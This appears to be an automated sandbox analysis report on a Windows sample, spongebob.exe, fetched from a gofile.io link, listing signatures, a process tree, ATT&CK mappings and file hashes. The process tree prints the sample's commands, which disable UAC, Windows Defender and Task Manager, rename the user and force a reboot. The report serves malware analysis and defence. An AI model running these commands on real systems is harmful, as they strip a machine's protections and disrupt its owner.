Analysis

max time kernel: 39s
max time network: 41s
platform: windows10-2004_x64
resource: win10v2004-20250502-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250502-en, locale:en-us, os:windows10-2004-x64, system
submitted: 19/05/2025, 15:14

Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
  Sample: https://gofile.io/d/ky2guY
  Resource: win10v2004-20250502-en

Errors

General
  Target: https://gofile.io/d/ky2guY
  Malware Config: -
Signatures

Modifies Windows Defender DisableAntiSpyware settings
  description | ioc | Process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | reg.exe

UAC bypass 3 TTPs 1 IoCs
  description | ioc | Process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe

Disables Task Manager via registry modification

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  flow | ioc
  14 | api.gofile.io
  16 | api.gofile.io

Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  description | ioc | Process
  Set value (str) | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp" | reg.exe

  resource | yara_rule
  behavioral1/memory/380-109-0x0000000000400000-0x00000000007BF000-memory.dmp | upx
  behavioral1/memory/380-239-0x0000000000400000-0x00000000007BF000-memory.dmp | upx

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | spongebob.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | rundll32.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net1.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | shutdown.exe

Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | chrome.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | chrome.exe

Enumerates system info in registry 2 TTPs 3 IoCs
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe

Modifies data under HKEY_USERS 17 IoCs
  description | ioc | Process
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "19" | LogonUI.exe
  Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | chrome.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | LogonUI.exe
  Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133921412781787940" | chrome.exe
  Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" | LogonUI.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | LogonUI.exe

Modifies registry class 1 IoCs
  description | ioc | Process
  Key created | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\Local Settings | chrome.exe

Modifies registry key 1 TTPs 3 IoCs
  pid | Process
  5760 | reg.exe
  1380 | reg.exe
  5656 | reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs
  pid | Process
  2392 | chrome.exe
  2392 | chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  pid | Process
  2392 | chrome.exe  (5 entries, all identical)

Suspicious use of AdjustPrivilegeToken 64 IoCs
  description | pid | Process
  Token: SeShutdownPrivilege | 2392 | chrome.exe
  Token: SeCreatePagefilePrivilege | 2392 | chrome.exe
  (these two rows alternate for all 64 entries, every one from PID 2392 chrome.exe)

Suspicious use of FindShellTrayWindow 36 IoCs
  pid | Process
  2392 | chrome.exe  (36 entries, all identical)

Suspicious use of SendNotifyMessage 24 IoCs
  pid | Process
  2392 | chrome.exe  (24 entries, all identical)

Suspicious use of SetWindowsHookEx 1 IoCs
  pid | Process
  2648 | LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs
  description | pid | Process | procid_target
  PID 2392 wrote to memory of 100 | 2392 | chrome.exe | 87
  PID 2392 wrote to memory of 608 | 2392 | chrome.exe | 88
  PID 2392 wrote to memory of 4056 | 2392 | chrome.exe | 89
  PID 2392 wrote to memory of 3972 | 2392 | chrome.exe | 90
  (64 entries in total: the 100 and 608 rows appear twice each; the 4056 and 3972 rows each repeat many times)
Processes

C:\Program Files\Google\Chrome\Application\chrome.exe  PID:2392
  Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://gofile.io/d/ky2guY
  - Checks processor information in registry
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory

  C:\Program Files\Google\Chrome\Application\chrome.exe  PID:100
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffee412dcf8,0x7ffee412dd04,0x7ffee412dd10

  C:\Program Files\Google\Chrome\Application\chrome.exe  PID:608
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1900,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2120 /prefetch:3

  C:\Program Files\Google\Chrome\Application\chrome.exe  PID:4056
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2084,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2080 /prefetch:2

  C:\Program Files\Google\Chrome\Application\chrome.exe  PID:3972
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2360,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2512 /prefetch:8

  C:\Program Files\Google\Chrome\Application\chrome.exe  PID:3880
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3176 /prefetch:1

  C:\Program Files\Google\Chrome\Application\chrome.exe  PID:380
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3216 /prefetch:1

  C:\Program Files\Google\Chrome\Application\chrome.exe  PID:2396
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4176,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4228 /prefetch:2

  C:\Program Files\Google\Chrome\Application\chrome.exe  PID:4584
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4588,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4716 /prefetch:1

  C:\Program Files\Google\Chrome\Application\chrome.exe  PID:5716
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4836,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3400 /prefetch:1

  C:\Program Files\Google\Chrome\Application\chrome.exe  PID:1788
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5376,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5392 /prefetch:8

  C:\Program Files\Google\Chrome\Application\chrome.exe  PID:5636
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5720,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5412 /prefetch:8

  C:\Program Files\Google\Chrome\Application\chrome.exe  PID:2788
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6068,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5936 /prefetch:8

  C:\Program Files\Google\Chrome\Application\chrome.exe  PID:5000
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5952,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4824 /prefetch:8

  C:\Program Files\Google\Chrome\Application\chrome.exe  PID:4356
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4708,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4820 /prefetch:8

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe  PID:1464
  Command: "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"

C:\Windows\system32\svchost.exe  PID:5944
  Command: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Windows\System32\rundll32.exe  PID:2380
  Command: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Downloads\Xeno.ext\xeno-main\Spongebob\spongebob.exe  PID:380
  Command: "C:\Users\Admin\Downloads\Xeno.ext\xeno-main\Spongebob\spongebob.exe"
  - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\cmd.exe  PID:2836
    Command: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F2CC.tmp\SpongebobFuck.cmd""
    - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\reg.exe  PID:5540
      Command: reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f
      - Sets desktop wallpaper using registry
      - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\rundll32.exe  PID:5516
      Command: RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\reg.exe  PID:5656
      Command: reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
      - System Location Discovery: System Language Discovery
      - Modifies registry key

    C:\Windows\SysWOW64\reg.exe  PID:5760
      Command: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      - UAC bypass
      - System Location Discovery: System Language Discovery
      - Modifies registry key

    C:\Windows\SysWOW64\reg.exe  PID:5640
      Command: Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      - Modifies Windows Defender DisableAntiSpyware settings
      - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\reg.exe  PID:1380
      Command: REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      - System Location Discovery: System Language Discovery
      - Modifies registry key

    C:\Windows\SysWOW64\net.exe  PID:1504
      Command: net user Admin /fullname:"SPONGEBOB WAS HERE!!!"
      - System Location Discovery: System Language Discovery

      C:\Windows\SysWOW64\net1.exe  PID:5892
        Command: C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB WAS HERE!!!"
        - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\shutdown.exe  PID:1236
      Command: shutdown /r /t 00
      - System Location Discovery: System Language Discovery

C:\Windows\system32\LogonUI.exe  PID:2648
  Command: "LogonUI.exe" /flags:0x4 /state0:0xa3978855 /state1:0x41c64e6d
  - Modifies data under HKEY_USERS
  - Suspicious use of SetWindowsHookEx

C:\Windows\System32\rundll32.exe  PID:1008
  Command: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
Network
MITRE ATT&CK Enterprise v16

Privilege Escalation
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
  Create or Modify System Process (1)
    Windows Service (1)

Defense Evasion
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
  Impair Defenses (2)
    Disable or Modify Tools (2)
  Modify Registry (4)
Downloads

Filesize: 649B
MD5: b1cb8a94dec704b47d4357a3d577b684
SHA1: b53dd6824f19224a26c83469dd8c05a68b8181ac
SHA256: 0d581e5d5b18dcb9ab67d0731677597aa29e8b7c95ceff7de255f67df70bf54a
SHA512: 76852da76000a7fc30d2bad5c592addfd51661771e25c0907be9523449123fcb369ec23c5a2fd5599a92a993854edfa6c315aa3661863bce8cc688474ae7c383

Filesize: 192B
MD5: 6101f7cfc998328b462cac3b78ae48d8
SHA1: 9155af2d1515b103582fe53a27f47e77f75e40a7
SHA256: 1b7c0fd68aad28c11db2ddf6452679ba6d8a6041a4a1626e5ad6d3767f3f5247
SHA512: 8abf656fe55c18d1a0502d449b850b34554128d03589ed699b595e9bdf5e99b38f4b8e69cfebe318bced441db9c980fe44a7c62c4d6d58ad9d486c021c7d46cb

Filesize: 2B
MD5: d751713988987e9331980363e24189ce
SHA1: 97d170e1550eee4afc0af065b78cda302a97674c
SHA256: 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512: b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Filesize: 10KB
MD5: aa3769a03fffccf110789ba6fee63d3f
SHA1: 79c441b2e5484fb1932cf55faf1a8c84b80497fa
SHA256: 94335ad66d50caa9dc5683748256d755c7c683341699386a54c95f1d2080e597
SHA512: f7ceb439a44bcf4e14c88af75b88ef3389bcb7b5df9b8b239cec00179653edb0fb6fd58dffc6a255ebd2fc7000b0f6cd9b8875b01288708b1adef241b0d1ca99

Filesize: 15KB
MD5: e729efef0721795dcd37e91fefe504c8
SHA1: e6d9aeb11858ff7af01fbacc769df6efe776441c
SHA256: dd886131b239603bd651803f5e321850072bac71afa2c0f38ce33b6b2f9bca2c
SHA512: 326ab39fe84c0a1d8efd371262742e83bd185359717178360e846fec312483eb826887733cdda30c9dc30c2e125efd048a8915707e91c9d83eb92c43cfbf6839

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
Filesize: 72B
MD5: 08b87f3ce7036b10e0232b701db5590c
SHA1: 882453d94981393e60afd7f65120882ebcbbecbf
SHA256: e0500e09ecee1632954bc6e4bff1332c42ec28cc8419318e04427afa6bbd2a97
SHA512: a52b04040066fc10c270810f1d873100fbd5de4baf039e6ff9a809eda8fa9246cd57c918c28c03507d61f48314928be412b7c3d8c614afb714f337c3d11a12f9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57d590.TMP
Filesize: 48B
MD5: 72e800a469b36b3e68016cb67e8a38c0
SHA1: dc4564d04822a4dd8fc51469f5d5d00e22362996
SHA256: 95b83d5f50435d858656e2678b1e6da3340a1882c24dce6ef8e0b48ad8ffbe6c
SHA512: d7dcb7d5d2697f1d2be120dced3ed1b358b19098056eb7925f0a3a641333a1afc577537d57748bd0f1242c1b2505a7800eeba33cd9a9886afd46b97c3e09cd45

Filesize: 79KB
MD5: 563aa971a36891fe4d27aef0b3bfd23a
SHA1: 0799cedd7d6f57c1e239fd3092c9941b163c2496
SHA256: 405a766f9eee795fa2c3ca36ae867c6bc7c8a2ccbcf8aa43e21f6b5d746651d5
SHA512: 3b8f45c0001ef3f81e8e827068624b0d3a92c2d9d2fcbb1c345fbcdc33514ddccb3d622d78a9c6ba835271dc275ff584174722378f34ab718b88bdc1efb4525d

Filesize: 80KB
MD5: 24d129fcb696a93574908da5ca988c78
SHA1: 242f9ac3770a03cd020613eb1e3f04f968455723
SHA256: 291ab33bb3cca864e8930e51ae648ea28e77a3e71984dfb1c33199713be4c239
SHA512: 9520434ed3160e663cde53a9abea4af698b682c3a0bc3f188047e78e77d950df6bf3d7a6852b4d9058f194ce80567054c715620fe055ae17487c7d08bc304dd7

Filesize: 80KB
MD5: a76c80abd3b724e6b5ecf9eb31dcba71
SHA1: 285b506576c7745f393644339eecccfb8bf0ef29
SHA256: fb1334c8dbd9a049082e0c41367f64f35d7e5b7c9ed6773b2af8c8c694841757
SHA512: 4b56c10c7b1b5b870f56cbae7f6f1bd5bcbaea2b6e0e5557b781dc8567084687c9685e380ea26d9029569ce6e1b6dc8693bfa621955686b596f6765dcc7699f2

Filesize: 92KB
MD5: 03d8b31db1ed1294334b872f756ad1a1
SHA1: 3f57aa9b9efb1ad9d576d799d9306abd4befdf89
SHA256: 7e17dcaafc07877e720b3fc0e666ac69e2dce8e7458ae9b23902bcf5f8f2a40a
SHA512: 55a979189ead8886c5fc3f35b927a80f8dff7a1d52136305c9efee7bc4f1b151d06348e75bef5b3203c47aaed98dc73692f097f7a967c64b9b743a5402012a86

Filesize: 11KB
MD5: 7a918ed93f7fb297e05464edccc46756
SHA1: 9464288fed7ba5d88928265882def5e05ffbe7db
SHA256: 82fcb47b437dc1bedb77648755770b7cd9a29342fd2ab972c8bd063968d04604
SHA512: cb70d6023b4bf23f35646e399c4ca7f0ab11ebf0a1e44cf0627afaa4025676c2a20ab82ffa28ed4a196dc8cf56b33b104bf457cf21d750a163955927dcba3cb1

Filesize: 2.6MB
MD5: ce45a70d3cc2941a147c09264fc1cda5
SHA1: 44cdf6c6a9ab62766b47caed1a6f832a86ecb6f9
SHA256: eceedadfde8506a73650cfa9a936e6a8fff7ffb664c9602bb14432aa2f8109ac
SHA512: d1bf6cdade55e9a7ce4243e41a696ae051835711f3d1e0f273ad3643f0b878266a8213cc13ca887a8181981ba4937350986e01e819b4bb109330718ef6251149

Filesize: 131B
MD5: 8884a25e47d799f6bd3d4ec20f05a3b7
SHA1: 8959822be4ecff5dd7fbdd714cd85775345d39c5
SHA256: 5a68437edd63bd826a1f1557121d4c05114c608fd8a18a0c9c156a60d90bd0c1
SHA512: 3722494fda291fe85f9276dc656b49fb977eea6403cf3a0b6bfaa77c1ec74a70c2a3012e420129f3c1fd939ef7928d94f0320a128b7087fa8f4f4080ae70973b

Filesize: 548KB
MD5: c1978e4080d1ec7e2edf49d6c9710045
SHA1: b6a87a32d80f6edf889e99fb47518e69435321ed
SHA256: c9e2a7905501745c304ffc5a70b290db40088d9dc10c47a98a953267468284a8
SHA512: 2de11fdf749dc7f4073062cdd4881cf51b78e56cb27351f463a45c934388da2cda24bf6b71670b432c9fc039e24de9edd0e2d5382b67b2681e097636ba17626e

Filesize: 7.3MB
MD5: f0bc760a442d651bf4eb6ed08856bb18
SHA1: f363e350b8aebbff036517ded088e177de97cb14
SHA256: 783829dfcd09317c8916249301ecf11236d160d62b7441d812d41817d1900eb4
SHA512: 7faf0dd31e1201cd81db11715bc2b230c6845bf608268aa3bfd087d60bc17e909dcaab9461aa1f4a20383fe89ed4025641aa546ea37edca930eff00cb514b76c

Filesize: 38B
MD5: 7c0b3ef9968d114404d5cb1ef66eae49
SHA1: 78fd3c71458513f6ac905427a5d0fcf4e535ee69
SHA256: b765f9b09b6c3d040c96e9b09eca1ed1a8bc3f980ba09beabc0a8df726181bbf
SHA512: ce42bf92bf7ee7d905463329f5f24dbf46b39d041e386343492825eac86bdfb917babd94df21eb5fee4f0f0b205c218ac1b17c4857763d5786c3cf8b96e347c9